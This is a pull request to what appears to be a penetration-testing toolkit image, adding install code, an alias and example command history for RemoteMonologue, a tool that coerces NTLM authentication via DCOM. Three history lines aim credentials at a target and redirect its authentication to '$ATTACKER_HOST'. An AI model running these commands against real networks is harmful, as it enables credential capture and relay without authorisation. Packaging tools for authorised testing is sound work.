### PR TITLE
Add the tool RemoteMonologue

### DIFF
--- a/sources/assets/shells/aliases.d/remotemonologue
+++ b/sources/assets/shells/aliases.d/remotemonologue
@@ -1,0 +1,1 @@
+alias remotemonologue.py='/opt/tools/RemoteMonologue/venv/bin/python3 /opt/tools/RemoteMonologue/RemoteMonologue.py'

--- a/sources/assets/shells/history.d/remotemonologue
+++ b/sources/assets/shells/history.d/remotemonologue
@@ -1,0 +1,3 @@
+remotemonologue.py "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET" -query
+remotemonologue.py "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET" -dcom {ServerDataCollectorSet,FileSystemImage,UpdateSession} -auth-to "$ATTACKER_HOST" -downgrade
+remotemonologue.py "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET" -dcom {ServerDataCollectorSet,FileSystemImage,UpdateSession} -auth-to "$ATTACKER_HOST"@80 -webclient

--- a/sources/install/package_ad.sh
+++ b/sources/install/package_ad.sh
@@ -233,7 +233,7 @@ function install_bloodhound-ce() {
     wget --directory-prefix "${azurehound_path}" "${azurehound_url_amd64_sha256}"
     [[ -f "${azurehound_path}/${azurehound_amd64_filename}" ]] || exit
     [[ -f "${azurehound_path}/${azurehound_amd64_filename}.sha256" ]] || exit
-    
+
     # Extract filename from URL for ARM64
     local azurehound_arm64_filename
     azurehound_arm64_filename=$(basename "${azurehound_url_arm64}")
@@ -1448,6 +1448,20 @@ function install_adminer() {
     add-to-list "AD-miner,https://github.com/Mazars-Tech/AD_Miner,Active Directory audit tool that leverages cypher queries."
 }
 
+function install_remotemonologue() {
+    colorecho "Installing RemoteMonologue"
+    git -C /opt/tools/ clone --depth 1 https://github.com/3lp4tr0n/RemoteMonologue
+    cd /opt/tools/RemoteMonologue || exit
+    python3 -m venv --system-site-packages ./venv
+    source ./venv/bin/activate
+    pip3 install impacket
+    deactivate
+    add-aliases remotemonologue
+    add-history remotemonologue
+    add-test-command "remotemonologue.py --help"
+    add-to-list "RemoteMonologue,https://github.com/3lp4tr0n/RemoteMonologue,A tool to coerce NTLM authentications via DCOM"
+}
+
 # Package dedicated to internal Active Directory tools
 function package_ad() {
     set_env
@@ -1555,6 +1569,7 @@ function package_ad() {
     install_smbclientng
     install_conpass                # Python tool for continuous password spraying taking into account the password policy.
     install_adminer
+    install_remotemonologue
     post_install
     end_time=$(date +%s)
     local elapsed_time=$((end_time - start_time))


### PR DESCRIPTION
Dear team,

this PR aims at adding the tool [RemoteMonologue](https://github.com/3lp4tr0n/RemoteMonologue) for the Active Directory image.
This tool helps to coerce NTLM authentications via DCOM.

More information about the tool and the technique in the corresponding [blog post](https://www.ibm.com/think/x-force/remotemonologue-weaponizing-dcom-ntlm-authentication-coercions).